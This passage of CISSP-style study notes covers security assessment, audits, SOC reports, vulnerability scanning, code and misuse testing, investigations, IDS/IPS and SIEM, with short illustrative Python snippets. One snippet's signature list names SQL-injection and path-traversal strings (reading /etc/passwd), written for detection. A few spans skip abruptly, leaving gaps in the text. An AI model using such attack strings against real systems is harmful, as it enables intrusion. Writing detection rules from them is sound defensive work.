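    for _ in range(rounds):
        mutant = mutate(seed)
        try:
            target(mutant)
        except Exception as exc:  # a real harness would also watch for hangs
            crashes.append((mutant, exc))
    return crashes
```

Generational (intelligent) fuzzing would replace `mutate` with a generator that builds inputs from a model of the expected format instead of random flips.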
IAM system: identity and access management system combines lifecycle management and monitoring tools to
ensure that identity and authorization are properly handled throughout an org
ITSM: IT Service Management tools include change management and associated approval tracking
Judgement Sampling: AKA purposive or authoritative sampling, a non-probability sampling technique where
members are chosen only on the basis of the researcher's knowledge and judgement
Misuse Case Testing: testing strategy from a hostile actor's point of view, attempting to lead to integrity
failures, malfunctions, or other security or safety compromises
Mutation testing: mutation testing modifies a program in small ways and then tests that mutant to determine if
it behaves as it should or if it fails; technique is used to design and test software through mutation
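A minimal illustration (hypothetical function and mutant): a single-operator mutation should be "killed" by a test suite that probes the boundary it changed:

```python
# Original function and a "mutant" with one small change (>= became >)
def is_adult(age: int) -> bool:
    return age >= 18

def is_adult_mutant(age: int) -> bool:
    return age > 18          # mutation: boundary operator changed

def run_tests(fn) -> bool:
    """A suite strong enough to kill the mutant must test the boundary value."""
    cases = [(17, False), (18, True), (40, True)]
    return all(fn(age) == expected for age, expected in cases)

assert run_tests(is_adult)             # original passes
assert not run_tests(is_adult_mutant)  # mutant fails -> the mutant is "killed"
```

A suite that never tested age 18 would let this mutant survive, revealing a gap in the tests.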
Penetration Testing/Ethical Penetration Testing: security testing and assessment where testers actively
attempt to circumvent/defeat a system's security features; typically constrained by contracts to stay within
specified Rules of Engagement (RoE)
Plan of Action and Milestones (POA&M): a document identifying tasks to be accomplished, including details,
resources, milestones, and completion target dates
RUM: real user monitoring is a passive monitoring technique that records user interaction with an app or system to
ensure performance and proper app behavior; often used as a pre-deployment process using the actual user
interface
RoE: Rules of Engagement, set of rules/constraints/boundaries that establish limits of participant activity; in
ethical pen testing, an RoE defines the scope of testing and establishes liability limits for both testers and the
sponsoring org or system owners
SCE: Script Check Engine is designed to make scripts interoperable with security policy definitions
Statistical Sampling: process of selecting subsets of examples from a population with the objective of
estimating properties of the total population
Substantive Test: testing technique used by an auditor to obtain the audit evidence in order to support the
auditor's opinion
Testing: process of exercising one or more assessment objects (activities or mechanisms) under specified
conditions to compare actual to expected behavior
Trust Services Criteria (TSC): used by an auditor when evaluating the suitability of the design and operating
effectiveness of controls relevant to the security, availability, or processing integrity of information and systems
or the confidentiality or privacy of the info processed by the entity
6.1 Design and validate assessment, test, and audit strategies (OSG-10 Chpt 15)
Security audits occur when a third-party performs an assessment of the security controls protecting an org's
information assets
6.1.1 Internal (e.g., within organization control)
An organizationʼs security staff can perform security tests and assessments, and the results are meant for
internal use only, designed to evaluate controls with an eye toward finding potential improvements
An internal audit strategy should be aligned to the organizationʼs business and day-to-day operations
e.g. a publicly traded company will have a more rigorous internal auditing strategy than a privately
held company
Designing the audit strategy should include laying out applicable regulatory requirements and compliance
goals
Internal audits are performed by an organizationʼs internal audit staff and are typically intended for
internal audiences, and management use
6.1.2 External (e.g., outside organization control)
An external audit strategy should complement the internal strategy, providing regular checks to ensure
that procedures are being followed and the organization is meeting its compliance goals
External audits are performed by an outside auditing firm
these audits have a high degree of external validity because the auditors performing the
assessment theoretically have no conflict of interest with the org itself
audits by these firms are generally considered acceptable by most investors and governing bodies
third-party audit reporting is generally intended for the org's governing body
6.1.3 Third-party (e.g., outside of enterprise control)
Third-party audits are conducted by, or on behalf of, another org
In the case of a third-party audit, the org initiating the audit generally selects the auditors and designs the
scope of the audit
The Statement on Standards for Attestation Engagements document 18 (SSAE 18), titled Reporting
on Controls, provides a common standard to be used by auditors performing assessments of service orgs
with the intent of allowing the org to conduct external assessments, instead of multiple third-party
assessments, and then sharing the resulting report with customers and potential customers
outside of the US, similar engagements are conducted under the International Standard for
Attestation Engagements (ISAE) 3402, Assurance Reports on Controls at a Service Organization
SSAE 18 and ISAE 3402 engagements are commonly referred to as a service organization controls (SOC)
audits
Three forms of SOC audits:
SOC 1 Engagements: assess the organizationʼs controls that might impact the accuracy of
financial reporting
SOC 2 Engagements: assess the organizationʼs controls that affect the security and privacy of
information stored in a system
SOC 2 focuses on 5 trust principles: Security, Availability, Confidentiality, Processing Integrity,
and Privacy
SOC 2 audit results are confidential and are usually only shared outside an org under an NDA
SOC 3 Engagements: assess the organizationʼs controls that affect the security (confidentiality,
integrity, and availability) and privacy of information stored in a system
however, SOC 3 audit results are intended for public disclosure; they are regarded primarily
as marketing tools
Two types of SOC reports:
Type I Reports: provide the auditorʼs opinion on the description provided by management and the
suitability of the design of the controls
type I reports cover only a specific point in time, rather than an extended period
think of Type I report as more of a documentation review
Type II Reports: go further and also provide the auditorʼs opinion on the operating effectiveness of
the controls
the auditor actually confirms the controls are functioning properly
Type II reports also cover an extended period of time, at least 6 months, typically a year
think of Type II report as similar to a traditional audit; the auditor is checking the paperwork,
and verifying the controls are functioning properly
Type II reports are considered much more reliable than Type I reports (Type I reports simply take
the service org's word that the controls are implemented as described); security pros want SOC 2,
Type II reports
6.1.4 Location (e.g., on-premise, cloud, hybrid)
On-premise assessment: focuses on evaluating the security measures and infrastructure of in-house
systems, or within an organization's physical data centers and facilities
Cloud assessment: focus is on assessing the security of data and applications hosted in a cloud service
provider's environment
Hybrid assessment: assess connectivity and security measures used between on-premise and cloud
resources; this assessment looks at data flow or interconnection and integration security controls
6.2 Conduct security controls testing (OSG-10 Chpt 15)
Security control testing can include testing of the physical facility, logical systems and applications; common
testing methods include the following
6.2.1 Vulnerability assessment
Vulnerabilities: weaknesses in systems and security controls that might be exploited by a threat
Vulnerability assessments: examining systems for these weaknesses; steps in the assessment:
Reconnaissance: passively gather publicly available info
Enumeration: actively enumerate through target IP addresses and ports
Vulnerability Analysis: Identify potential vulns to be exploited
Execution: applies only if you are doing a penetration test
Document Findings: reporting on findings and severity
The goal of a vulnerability assessment is to identify elements in an environment that are not adequately
protected -- and not necessarily from a technical perspective; you can also assess the vulnerability of
physical security or the external reliance on power, for instance
can include personnel testing, physical testing, system and network testing, and other facilities
tests
Vulnerability assessments are some of the most important testing tools in the information security
professionalʼs toolkit
Security Content Automation Protocol (SCAP): provides a common framework and suite of
specifications that standardize how software flaws and security configuration information are
communicated, both to machines and humans; SCAP also facilitates automation of interactions between
different security systems (see NIST SP 800-126)
SCAP components related to vulnerability assessments:
Common Vulnerabilities and Exposures (CVE): provides a naming system for describing
security vulnerabilities
Common Vulnerability Scoring System (CVSS): provides a standardized scoring system
for describing the severity of security vulnerabilities; it includes metrics and calc tools for
exploitability, impact, how mature exploit code is, and how vulnerabilities can be remediated,
and a means to score vulns against users' unique requirements
Common Configuration Enumeration (CCE): provides a naming system for system config
issues
Common Platform Enumeration (CPE): provides a naming system for operating systems,
applications, and devices
eXtensible Configuration Checklist Description Format (XCCDF): provides a language for
specifying security checklists
Open Vulnerability and Assessment Language (OVAL): provides a language for describing
security testing procedures; used to describe the security condition of a system
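As a worked example of the CVSS component above: CVSS v3.x maps base scores to qualitative severity ratings in fixed bands (None 0.0, Low 0.1-3.9, Medium 4.0-6.9, High 7.0-8.9, Critical 9.0-10.0), which can be sketched as:

```python
def cvss_v3_severity(score: float) -> str:
    """Map a CVSS v3.x base score to its qualitative severity rating
    (bands defined in the CVSS v3.1 specification)."""
    if not 0.0 <= score <= 10.0:
        raise ValueError("CVSS base scores range from 0.0 to 10.0")
    if score == 0.0:
        return "None"
    if score <= 3.9:
        return "Low"
    if score <= 6.9:
        return "Medium"
    if score <= 8.9:
        return "High"
    return "Critical"

print(cvss_v3_severity(9.8))   # e.g. a score typical of remote code execution vulns
```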
Vulnerability scans automatically probe systems, applications, and networks looking for weaknesses that
could be exploited by an attacker
flaws may include missing patches, misconfigurations, or faulty code
Four main categories of vulnerability scans:
network discovery scans
network vulnerability scans
web application vulnerability scans
database vulnerability scans
Authenticated scans: (AKA credentialed security scan) involves conducting vulnerability assessments
and security checks on a network, system, or application using valid credentials; this approach enables
the scanner to simulate the actions of an authenticated user, allowing it to access deeper layers of the
target system, gather more information, and provide a more accurate assessment of vulnerabilities; often
uses a read-only account to access configuration files
6.2.2 Penetration testing (e.g., red, blue, and/or purple team exercises)
Penetration tests go beyond vulnerability testing techniques because they attempt to exploit systems
Vulnerability management: the cyclical process of identifying, classifying, prioritizing, and mitigating
vulnerabilities; programs take the results of the tests as inputs and then implement a risk management
process for identified vulnerabilities, with the following steps:
Asset inventory
Identifying the value of each asset
Identifying the vulnerabilities for each asset
Ongoing review and assessment
Testing stages from the OSG include:
Reconnaissance: passively gather publicly available info
Enumeration: active network discovery (i.e. find target IP address and ports)
Vulnerability analysis: identify potential vulns
digital forensics
security operations
Purple: not a separate team, but purple represents the collaboration between the red and
blue teams:
red and blue teams working together
providing information sharing and healthy competition
6.2.3 Log reviews
Security Information and Event Management (SIEM): packages that collect information using the
syslog functionality present in many devices, operating systems, and applications
SIEM capabilities: aggregation, normalization, correlation, secure storage, analysis, reporting
Log data is recorded in databases; common logs include:
security, application, firewall, proxy, and change management logs
Log files should be protected by centrally storing them and using permissions to restrict access, and
archived logs should be set to read-only to prevent modification
Admins may choose to deploy logging policies through Windows Group Policy Objects (GPOs)
Logging systems should also make use of the Network Time Protocol (NTP) to ensure that clocks are
synchronized on systems sending log entries to the SIEM as well as the SIEM itself, ensuring info from
multiple sources have a consistent timeline
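The value of synchronized clocks can be shown with a small sketch (hypothetical timestamp formats and offsets): once two devices' local timestamps are normalized to UTC, the same event lines up on one timeline:

```python
from datetime import datetime, timezone, timedelta

def normalize(ts: str, fmt: str, utc_offset_hours: int) -> datetime:
    """Convert a source-local log timestamp to UTC so events from multiple
    systems line up on a single timeline."""
    local = datetime.strptime(ts, fmt).replace(
        tzinfo=timezone(timedelta(hours=utc_offset_hours)))
    return local.astimezone(timezone.utc)

# Two devices logging the same event in different local times
a = normalize("2025-06-11 14:05:09", "%Y-%m-%d %H:%M:%S", -4)  # UTC-4 device
b = normalize("2025-06-11 19:05:09", "%Y-%m-%d %H:%M:%S", +1)  # UTC+1 device
assert a == b   # identical instant once normalized to UTC
```

NTP keeps the source clocks themselves in agreement; the normalization above only works if the devices' clocks were accurate to begin with.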
Information security managers should also periodically conduct log reviews, particularly for sensitive
functions, to ensure that privileged users are not abusing their privileges
Network flow (NetFlow) logs are particularly useful when investigating security incidents
6.2.4 Synthetic transactions/benchmarks
Synthetic transactions: scripted transactions with known expected results
Synthetic monitoring: uses emulated or recorded transactions to monitor for performance changes in
response time, functionality, or other performance monitors
Dynamic testing may include the use of synthetic transactions to verify system performance; synthetic
transactions are run against code and their output is compared to the expected state
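A minimal sketch of the idea, with a hypothetical `transfer` operation as the system under test:

```python
def transfer(balance: int, amount: int) -> int:
    """System under test: a toy account operation."""
    if amount <= 0 or amount > balance:
        raise ValueError("invalid amount")
    return balance - amount

# Scripted transactions with known expected results
synthetic_transactions = [
    ((100, 30), 70),
    ((50, 50), 0),
]
for args, expected in synthetic_transactions:
    actual = transfer(*args)
    assert actual == expected, f"transfer{args}: got {actual}, expected {expected}"
print("all synthetic transactions matched expected state")
```

In production monitoring these scripted transactions would be replayed on a schedule against the live system, alerting when response time or results deviate from the known baseline.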
6.2.5 Code review and testing
Code review and testing is "one of the most critical components of a software testing program"
These procedures provide third-party reviews of the work performed by developers before moving code
into a production environment, possibly discovering security, performance, or reliability flaws in apps
before they go live and negatively impact business operations
In code review, AKA peer review, developers other than the one who wrote the code review it for defects;
code review can be a formal or informal validation process
Fagan inspections: the most formal code review process follows six steps:
1. planning
2. overview
3. preparation
4. inspection
5. rework
6. follow-up
Entry criteria are the criteria or requirements which must be met to enter a specific process
Exit criteria are the criteria or requirements which must be met to complete a specific process
Static application security testing (SAST): evaluates the security of software without running it by
analyzing either the source code or the compiled application; code reviews are an example of static app
security testing
Dynamic application security testing (DAST): evaluates the security of software in a runtime
environment and is often the only option for organizations deploying applications written by someone else
6.2.6 Misuse case testing
Misuse case testing: AKA abuse case testing - used by software testers to evaluate the vulnerability of
their software to known risks; focuses on behaviors that are not what the org desires or that are counter
to the proper function of a system/app
In misuse case testing, testers first enumerate the known misuse cases, then attempt to exploit those use
cases with manual or automated attack techniques
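A toy illustration of that workflow (the `login` routine and misuse cases are hypothetical): enumerate the known misuse cases, then verify every one of them fails:

```python
def login(username: str, password: str, store: dict) -> bool:
    """Hypothetical authentication routine under test."""
    return store.get(username) == password

store = {"alice": "s3cret"}

# Enumerate known misuse cases, then attempt each one
misuse_cases = {
    "SQL-injection-style input":  ("alice' --", "x"),
    "empty credentials":          ("", ""),
    "valid user, wrong password": ("alice", "guess"),
}
for name, (user, pw) in misuse_cases.items():
    assert login(user, pw, store) is False, f"misuse case succeeded: {name}"
print(f"{len(misuse_cases)} misuse cases correctly rejected")
```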
6.2.7 Coverage analysis
A test coverage analysis is used to estimate the degree of testing conducted against new software, and to
provide insight into how well testing covered the use cases that an app is being tested for
Test coverage: number of use cases tested / total number of use cases
requires enumerating possible use cases (a difficult task); anyone using test coverage
calcs should understand the process used to develop the input values
Five common criteria used for test coverage analysis:
branch coverage: has every IF statement been executed under all IF and ELSE conditions?
condition coverage: has every logical test in the code been executed under all sets of inputs?
functional coverage: has every function in the code been called and returned results?
loop coverage: has every loop in the code been executed under conditions that cause code
execution multiple times, only once, and not at all?
statement coverage: has every line of code been executed during the test?
Test coverage report: measures how many of the test cases have been completed; is used to provide
test metrics when using test cases
6.2.8 Interface testing (e.g., user interface, network interface, application programming interface (API))
Interface testing assesses the performance of modules against the interface specs to ensure that they
will work together properly when all the development efforts are complete
Interface testing essentially assesses the interaction between components and users with API testing,
user interface testing, and physical interface testing
Three types of interfaces should be tested:
application programming interfaces (APIs): offer a standardized way for code modules to
interact and may be exposed to the outside world through web services
should test APIs to ensure they enforce all security requirements
user interfaces (UIs): examples include graphical user interfaces (GUIs) and command-line
interfaces
UIs provide end users with the ability to interact with the software, and tests should
include reviews of all UIs
physical interfaces: exist in some apps that manipulate machinery, logic controllers, or other
objects
software testers should pay careful attention to physical interfaces because of the
potential consequences if they fail
Also see OWASP API security top 10
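A minimal sketch of API security testing, using a hypothetical in-process handler rather than a real web service: verify the security requirement (authentication) before the happy path:

```python
def api_get_user(request: dict) -> dict:
    """Toy API endpoint: requires a bearer token before returning data."""
    if request.get("headers", {}).get("Authorization") != "Bearer valid-token":
        return {"status": 401, "body": "unauthorized"}
    return {"status": 200, "body": {"user": "alice"}}

# Interface tests: security requirements first, then the happy path
assert api_get_user({})["status"] == 401                # no credentials at all
assert api_get_user({"headers": {}})["status"] == 401   # missing auth header
ok = api_get_user({"headers": {"Authorization": "Bearer valid-token"}})
assert ok["status"] == 200 and ok["body"]["user"] == "alice"
```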
6.2.9 Breach attack simulations
Breach and attack simulation (BAS): platforms that seek to automate some aspects of penetration
testing
The BAS platform is not actually waging attacks, but conducting automated testing of security controls to
identify deficiencies
A BAS system combines red team (attack) and blue team (defense) techniques together with automation
to simulate advanced persistent threats (and other advanced threat actors) running against the
environment
Designed to inject threat indicators onto systems and networks in an effort to trigger other security
controls (e.g. place a suspicious file on a server)
detection and prevention controls should immediately detect and/or block this traffic as potentially
malicious
See:
OWASP Web Security Testing Guide
OSSTMM (Open Source Security Testing Methodology Manual)
NIST 800-115
FedRAMP Penetration Test Guidance
PCI DSS Information Supplemental on Penetration Testing
6.2.10 Compliance checks
Orgs should create and maintain compliance plans documenting each of their regulatory obligations and
map those to the specific security controls designed to satisfy each objective
Compliance checks are an important part of security testing and assessment programs for regulated
firms: these checks verify that all of the controls listed in a compliance plan are functioning properly and
are effectively meeting regulatory requirements
6.3 Collect security process data (e.g. technical and administrative) (OSG-10 Chpts
15,18)
Many components of the information security program generate data that is crucial to security assessment
processes; these components include:
Account management process
Management review and approval
Key performance and risk indicators
Backup verification data
Data generated by disaster recovery and business continuity programs
6.3.1 Account management
Preferred attacker techniques for obtaining privilege user access include:
compromising an existing privileged account: mitigated through use of strong authentication
(strong passwords and multifactor), and by admins use of privileged accounts only for specific
tasks
privilege escalation of a regular account or creation of a new account: these approaches can be
mitigated by paying attention to the creation, modification, and use of user accounts
6.3.2 Management review and approval
Account management reviews ensure that users only retain authorized permissions and that unauthorized
modifications do not occur
Full review of accounts: time-consuming to review all, and often done only for highly privileged accounts
Organizations that donʼt have time to conduct a full review process may use sampling, but only if
sampling is truly random
Adding accounts: should be a well-defined process, and users should sign an AUP
Adding, removing, and modifying accounts and permissions should be carefully controlled and
documented
Accounts that are no longer needed should be suspended
and with internal and external entities, assessment of response efforts, and restoration of services
DR programs should also include training and awareness efforts to ensure personnel understand
their responsibilities and lessons learned sessions to continuously improve the program
These processes need to be periodically assessed, and regular testing of disaster recovery and business
continuity controls provide organizations with the assurance they are effectively protected against
disruptions to business ops
Protection of life is of the utmost importance and should be dealt with first before attempting to save
material things
6.4 Analyze test output and generate report (OSG-10 Chpt 15)
Step 1: review and understand the data
The goal of the analysis process is to proceed logically from facts to actionable info
A list of vulns and policy exceptions is of little value to business leaders unless it's used in context, so
once all results have been analyzed, you're ready to start writing the official report
Step 2: determine the business impact of those facts
Ask "so what?"
Step 3: determine what is actionable
The analysis process leads to valuable results only if they are actionable
6.4.1 Remediation
Rather than software defects, most vulnerabilities in average orgs come from misconfigured systems,
inadequate policies, unsound business processes, or unaware staff
Vuln remediation should include all stakeholders, not just IT
6.4.2 Exception handling
Exception handling: the process of handling unexpected activity, since software should never depend on
users behaving properly
"expect the unexpected", gracefully handle invalid input and improperly sequenced activity etc
Sometimes vulns can't be patched in a timely manner (e.g. medical devices needing re-accreditation) and
the solution is to implement compensatory controls, document the exception and decision, and revisit
compensatory controls: measures taken to address any weaknesses of existing controls or to
compensate for the inability to meet specific security requirements due to various different
constraints
e.g. micro-segmentation of device, access restrictions, monitoring etc
Exception handling may be required due to a system crash resulting from patching (requiring roll-back)
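Graceful handling of invalid input can be sketched as follows (a hypothetical port-parsing helper):

```python
def parse_port(value: str) -> int:
    """Gracefully handle invalid input instead of assuming users behave properly."""
    try:
        port = int(value)
    except (TypeError, ValueError):
        raise ValueError(f"not a number: {value!r}") from None
    if not 1 <= port <= 65535:
        raise ValueError(f"port out of range: {port}")
    return port

assert parse_port("443") == 443
for bad in ("", "abc", "-1", "99999"):
    try:
        parse_port(bad)
    except ValueError:
        pass   # invalid input rejected with a clear error, not a crash
    else:
        raise AssertionError(f"accepted bad input: {bad!r}")
```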
6.4.3 Ethical disclosure
While conducting security testing, cybersecurity pros may discover previously unknown vulns that
they are unable to correct (perhaps implementing compensating controls instead)
Ethical disclosure: the idea that security pros who detect a vuln have a responsibility to report it to the
vendor, providing them with enough time to patch or remediate
the disclosure should be made privately to the vendor, providing a reasonable amount of time to
correct
if the vuln is not corrected, then public disclosure of the vuln is warranted, such that other
professionals can make informed decisions about future use of the product(s)
Heuristics: method of machine learning which identifies patterns of acceptable activity, so that deviations from
the patterns will be identified
Incident: an event which potentially or actually jeopardizes the CIA of an information system or the info the
system processes, stores, transmits
Indicator: technical artifact or observable occurrence suggesting that an attack is imminent, currently
underway, or already occurred
Indicators of Compromise (IoC): a signal that an intrusion, malware, or other predefined hostile or hazardous
set of events has or is occurring
Information Security Continuous Monitoring (ISCM): maintaining ongoing awareness of information security,
vulnerabilities and threats to support organizational risk management decisions; ongoing monitoring sufficient
to ensure and assure effectiveness of security controls
Information Sharing and Analysis Center (ISAC): entity or collab created for the purposes of analyzing critical
cyber and related info to better understand security problems and interdependencies to ensure CIA
Log: record of actions/events that have taken place on a system
Motion detector types: wave pattern motion detectors transmit ultrasonic or microwave signals into the
monitored area watching for changes in the returned signals bouncing off objects; infrared heat-based
detectors watch for unusual heat patterns; capacitance detectors work based on electromagnetic fields
MTBF: mean time between failure is an estimation of time between the first and any subsequent failures
MTTF: mean time to failure is the expected typical functional lifetime of the device given a specific operating
environment
MTTR: mean time to repair is the average length of time required to perform a repair on the device
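A hedged sketch of how these metrics might be derived from failure and repair records (the figures are invented):

```python
# Hypothetical maintenance records, in hours
failure_times = [1000, 2500, 4600]      # clock hours at which failures occurred
repair_durations = [2.0, 3.5, 2.5]      # hours spent on each repair

# MTBF: average interval between successive failures
intervals = [b - a for a, b in zip(failure_times, failure_times[1:])]
mtbf = sum(intervals) / len(intervals)

# MTTR: average length of a repair
mttr = sum(repair_durations) / len(repair_durations)

print(f"MTBF = {mtbf:.0f} h, MTTR = {mttr:.1f} h")
```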
Netflow: data that contains info on the source, destination, and size of all network communications and is
routinely saved as a matter of normal activity; captures info about the parties involved in a communication and
the amount of data exchanged
Precursor: signal from events suggesting a possible change of conditions, that may alter the current threat
landscape
Regression testing: testing of a system to ascertain whether recently approved modifications have changed its
performance, or if other approved functions have introduced unauthorized behaviors
Request For Change (RFC): documentation of a proposed change in support of change management activities
Resource capacity agreement: used to make sure the appropriate resources will be available in a recovery
scenario
Root Cause Analysis: principle-based systems approach for the identification of underlying causes associated
with a particular risk set or incidents
RTBH (Remote Triggered Black Hole): a network security technique used in conjunction with firewalls and
routers to mitigate Distributed Denial of Service (DDoS) attacks or unwanted traffic by dropping malicious or
unwanted traffic before it reaches the target network; RTBH works by creating a "black hole route", where
packets destined for a specific IP address are discarded or "dropped" by the network equipment, effectively
isolating malicious traffic
Sampling: one of two main methods of choosing records from a large pool for further analysis, sampling uses
statistical techniques to choose a sample that is representative of the entire pool; sampling is a data extraction
process, where elements are selected from a large body of data to construct a meaningful representation or
summary of the whole; statistical sampling uses precise math functions to extract meaningful info from a large
volume of data (also see clipping)
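A minimal sketch of simple random sampling from a large pool of records (the event names are synthetic):

```python
import random

# Statistical sampling: choose a representative subset of a large record pool
population = [f"logon-event-{i:05d}" for i in range(10_000)]
rng = random.Random(7)                    # fixed seed for repeatability
sample = rng.sample(population, k=100)    # simple random sample, no replacement

assert len(sample) == 100
assert len(set(sample)) == 100            # sampling without replacement
assert all(item in population for item in sample)
```

An auditor would then examine only the 100 sampled records and use statistical techniques to estimate properties of all 10,000.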
SCCM: System Center Configuration Manager is a Microsoft systems management software product that
provides the capability to manage large groups of computers providing remote control, patch management,
software distribution, operating system deployment, and hardware and software inventory
Security Incident: Any attempt to undermine the security of an org or violation of a security policy is a security
incident
SWG (Secure Web Gateway): a security solution that filters and monitors internet traffic for orgs, ensuring that
users can securely access the web while blocking malicious sites, preventing data leaks, and enforcing web
browsing policies; while it is not a traditional firewall, it complements firewall functionality by focusing
specifically on web traffic security
TCP Wrappers: a host-based network access control system used in Unix-like operating systems to filter
incoming connections to network services; allows administrators to define which IP addresses or hostnames are
allowed or denied access to certain network services, such as SSH, FTP, or SMTP, by controlling access based
on incoming TCP connections; TCP Wrappers relies on two config files: /etc/hosts.allow, and /etc/hosts.deny
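As a brief illustration of the two config files' `daemon : client-list` syntax (the subnet and domain below are placeholders):

```
# /etc/hosts.allow -- checked first; the first matching rule wins
sshd : 192.168.1.0/255.255.255.0      # allow SSH from the internal subnet
vsftpd : .example.com                 # allow FTP from hosts under example.com

# /etc/hosts.deny -- consulted only if nothing matched above
ALL : ALL                             # default-deny everything else
```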
Trusted Computing Base (TCB): the collection of all hardware, software, and firmware components within an
architecture that is specifically responsible for security and the isolation of objects that forms a trusted base
TCB is a term that is usually associated with security kernels and the reference monitor
a trusted base enforces the security policy
a security perimeter is the imaginary boundary that separates the TCB from the rest of the system; TCB
components communicate with non-TCB components using trusted paths
Reference Monitor Concept (RMC): the logical part of the TCB that confirms whether a subject has the
right to use a resource prior to granting access; based on three principles: Complete Mediation (all
access must be validated by the Reference Monitor), Verifiability (the correct operation of the Reference
monitor can be analyzed and verified), and Isolation (the Reference Monitor must be protected from
unauthorized modification or tampering)
the security kernel is the collection of the TCB components that implement the functionality of the
reference monitor
Tuple: tuple usually refers to a collection of values that represent specific attributes of a network connection or
packet; these values are used to uniquely identify and manage network flows, as part of a state table or rule set
in a firewall; as an example, a 5-tuple is a bundle of five values that identify a specific connection or network
session, which might include the source IP address, source port number, destination IP address, destination
port number, and the specific protocol in use (e.g. TCP, UDP)
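A sketch of a 5-tuple used as a firewall state-table key (the addresses and ports are illustrative):

```python
from typing import NamedTuple

class FiveTuple(NamedTuple):
    """The five values that uniquely identify a network session."""
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    protocol: str

# A stateful firewall keys its state table on the 5-tuple
state_table: set[FiveTuple] = set()
conn = FiveTuple("10.0.0.5", 49152, "93.184.216.34", 443, "TCP")
state_table.add(conn)

# A later packet carrying the same 5-tuple matches the tracked session
assert FiveTuple("10.0.0.5", 49152, "93.184.216.34", 443, "TCP") in state_table
```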
Vendor Management System (VMS): software that assists with the management and procurement of staffing
services, hardware, software, and other products and services
View-Based access controls: access control that allows the database to be logically divided into components
like records, fields, or groups allowing sensitive data to be hidden from non-authorized users; admins can set up
views by user type, allowing only access to assigned views
7.1 Understand and comply with investigations (OSG-10 Chpt 19)
Investigation: a formal inquiry and systematic process that involves gathering information to determine the
cause of a security incident or violation
Investigators must be able to conduct reliable investigations that will hold up in court; securing the scene is an
essential and critical part of every investigation
securing the scene might include any/all of the following:
sealing off access to the area or crime scene
taking images of the scene
documenting evidence
ensuring evidence (e.g. computers, mobile devices, portable drives etc) is not contacted, tampered
with, or destroyed
general principles:
identify and secure the scene
protect evidence -- proper collection of evidence preserves its integrity and the chain of custody
identification and examination of the evidence
further analysis of the most compelling evidence
final reporting of findings
Locard exchange principle: whenever a crime is committed something is taken, and something is left behind
small changes like interacting with the keyboard, mouse, loading/unloading programs, or of course
powering off the system, can change or eliminate live evidence
Whenever a forensic investigation of a storage drive is conducted, two identical bit-for-bit copies of the
original drive should be created first
eDiscovery (E-Discovery): the process of identifying, collecting, and producing electronically stored
information for legal proceedings; the E-Discovery reference model (EDRM) has 9 steps:
1. Information Governance - ensuring information is well-organized, and balancing value, risk and cost
2. Identification - locating potential sources of electronically stored information covered by a
discovery request, and determining its scope, breadth, and depth
3. Preservation - ensuring data is protected against alteration or destruction
4. Collection - gathering data for further use in the process
5. Processing - screening and reducing the volume of data, and converting as appropriate to forms
suitable for review and analysis
6. Review - evaluating data for relevance; what information needs to be provided, and what may need
to be protected
7. Analysis - evaluating data for content and context
8. Production - delivering electronically stored information in a sharable form
9. Presentation - displaying before appropriate audiences (e.g. depositions, hearings, trials etc)
orgs that believe they will be the target of a lawsuit have a duty to preserve digital evidence
7.1.5 Artifacts (e.g., data, computer, network, mobile device)
Forensic artifacts: remnants of a system or network breach/attempted breach, which may or may not
be relevant to an investigation or response
Artifacts can be found in numerous places, including:
computer systems
web browsers
mobile devices
hard drives, flash drives
7.2 Conduct logging and monitoring activities (OSG-10 Chpts 17,21)
7.2.1 Intrusion detection and prevention system (IDPS)
Intrusion: a security event, or a combination of multiple security events, that constitutes an incident;
occurs when an attacker attempts to bypass (or successfully bypasses/thwarts) security mechanisms and
accesses an organizationʼs resources without the authority to do so
Intrusion detection: a specific form of monitoring events, usually in real time, to detect abnormal activity
indicating a potential incident or intrusion
Intrusion Detection System (IDS): (AKA burglar alarms) a security service that monitors and analyzes
network or system events to provide real-time/near-real-time warnings of unauthorized
attempts to access system resources; automates the inspection of logs and real-time system events to
detect intrusion attempts and system failures
an IDS is intended as part of a defense-in-depth security plan
Intrusion Prevention Systems (IPS): an IPS is a security service that uses available info to determine if
an attack is underway, alerting on and blocking attacks before they reach the intended target; because an
IPS includes detection capabilities, youʼll also see them referred to as intrusion detection and prevention
systems (IDPSs)
an IPS can be a signature-based detection system which matches traffic patterns against a
database of known attack signatures; it can be anomaly or behavior-based detection, that starts
with a baseline, comparing activity to the baseline to detect abnormal activity; IPS can also be
policy-based, comparing activity to predefined security policies, or hybrid of these
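The detection styles above can be sketched side by side — a hypothetical hybrid check that flags traffic on either a known signature or a large deviation from a traffic baseline (the signatures and threshold are illustrative, not from any real IPS):

```python
# Illustrative signature database and hybrid detection logic.
SIGNATURES = {"' OR 1=1", "../../etc/passwd"}   # known attack patterns

def signature_match(payload: str) -> bool:
    """Signature-based: match traffic against a database of known attacks."""
    return any(sig in payload for sig in SIGNATURES)

def anomaly_score(value: float, baseline: list[float]) -> float:
    """Anomaly-based: distance from the baseline mean, in standard deviations."""
    mean = sum(baseline) / len(baseline)
    var = sum((x - mean) ** 2 for x in baseline) / len(baseline)
    return abs(value - mean) / (var ** 0.5 or 1.0)

def is_intrusion(payload: str, requests_per_min: float, baseline: list[float]) -> bool:
    # Hybrid: flag on a known signature OR a large deviation from normal traffic.
    return signature_match(payload) or anomaly_score(requests_per_min, baseline) > 3.0
```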
NIST SP 800-94 Guide to Intrusion Detection and Prevention Systems provides comprehensive (albeit
outdated) coverage of both IDS and IPS
7.2.2 Security Information and Event Management (SIEM)
Security Information and Event Management (SIEM): systems that ingest logs from multiple sources,
compile and analyze log entries, and report relevant information
SIEM systems are complex and require expertise to install and tune
require a properly trained team that understands how to read and interpret info, and escalation
procedures to follow when a legitimate alert is raised
SIEM systems represent technology, process, and people, and each is important to overall
effectiveness
a SIEM includes significant intelligence functionality, allowing analysis and correlation of large
volumes of logged events to occur very quickly
SIEM capabilities include:
Aggregation
Normalization
Correlation
Secure storage
Analysis
Reporting
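Normalization and correlation — two of the capabilities listed above — can be illustrated with a toy sketch: raw log lines are parsed into a common schema, then a correlation rule flags repeated failed logins (the log format and rule are hypothetical):

```python
import re
from collections import Counter

def normalize(raw: str) -> dict:
    """Parse one raw syslog-style line into a common schema (hypothetical format)."""
    m = re.match(r"(?P<ts>\S+) (?P<host>\S+) (?P<event>\w+) user=(?P<user>\w+)", raw)
    return m.groupdict() if m else {}

def correlate_failed_logins(events: list[dict], threshold: int = 3) -> set[str]:
    """Correlation rule: flag users with repeated LOGIN_FAIL events."""
    fails = Counter(e["user"] for e in events if e.get("event") == "LOGIN_FAIL")
    return {user for user, n in fails.items() if n >= threshold}
```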
